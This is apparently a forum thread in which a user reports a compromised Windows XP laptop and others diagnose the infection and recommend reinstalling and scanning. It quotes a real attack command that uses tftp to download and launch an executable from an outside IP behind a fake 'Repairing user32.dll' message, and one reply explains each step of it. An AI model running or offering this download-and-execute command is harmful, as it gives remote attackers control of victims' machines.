Compromised Windows XP machine

In my company, some people take laptops out in the field, aka the real world..

Many have reported, and I have seen myself, lots of emails being sent after something like this shows up in the start>run window ..

Quote:

---

%comspec% /c echo Repairing user32.dll & echo Please Wait... tftp -i 75.132.3.206 GET xpjush.exe & start xpjush&

---

I've turned the windows firewall back on and I think that'll do it, but I was wondering if the machine was definitely compromised or if it was something that could be stopped.. ?

Short answer is, yes you are compromised. It's seems to have something to do with VNC.
More Info is here:

http://forums.speedguide.net/showthread.php?t=219431

Cheers:

Thanks for the link!

Quote:

---

Originally Posted by Trevoke

I've turned the windows firewall back on and I think that'll do it, but I was wondering if the machine was definitely compromised or if it was something that could be stopped.. ?

---

Turning on the XP firewall won't do it. It doesn't block outgoing traffic. Those machines are compromised alright. Better be safe then sorry and reinstall. Don't forget all the service packs and patches too.

The first download called, will open windows firewall to download the second exe, which if your AV defs are upto date, should catch the payload.

Try an online scan via www.pandasoftware.com or housecall.trendmicro.com

Never hurts to get a second opinion.

Trevoke, I won't waist your time with what I think as I agree with the answers here, however, knowing what OS you like to use, I think it could be a neat idea if you set up a machine to sniff traffic and see where this stuff comes in from.

Could be a fun little project for you. I used to do something similar at my college: I would set up my laptop on the network, open up iptraf, watch, then open up wireshark if I wanted a GUI, and kind of watch what was going on.

It's amazing what an expensive firewall used by a college will let in heh.

A fair idea, gore. I like it. Thanks. :)

No problem. And hey if you track them down you might be able to prevent more :)

Quote:

---

%comspec% /c echo Repairing user32.dll & echo Please Wait... tftp -i 75.132.3.206 GET xpjush.exe & start xpjush&

---

Quote:

---

I think it could be a neat idea if you set up a machine to sniff traffic and see where this stuff comes in from.

---

Good job they didn't include their IP address in the exploit command as it would be too easy to track them down then....you would have to sniff the network traffic to work it out......

Check your eventvwr and you will see the IP address that they connected from, which will more than likely be the same one that you see in the command they issued.

A break down of the command is:

%comspec% is a variable which points to
the command prompt exe.

The /c switch tells the command shell to carry out the command passed to it and then terminate.

echo, will obviously display what ever follows the command onto the screen - this is just to make the user think something is happening to Windows and can be anything that you want it to be.

Now the host will connect via TFTP to 75.132.3.206, the -i switch tells it to GET (download) the file in octet format, which is the method used to receive exe files

Then the newly downloaded file is launched

It is a very common exploit and is mistakenly believed to relate to VNC - whilst VNC is the easiest way to connect to a remote host to issue the command, it is not directly at fault and really does not have much to do with the way to command works and the end result of issuing it.

Normally the first goal would be to see if the Windows firewall is on and if it is, to add a few exceptions to it to enable to attacker to connect to you on what ever port the newly downloaded application will listen on. If you are not logged in as a local admin then this is negated and the attack will fail. If you are logged in as a local admin then it's time to learn a lesson, as the attacker will probably have spawned a shell with local admin rights and you are pretty much guaranteed of not getting rid of him (if he is any good).

Either way, if someone has ran that command then you will now have an application running on your machine that you don't really want.... I would personally go through all the necessary stuff to locate and remove it.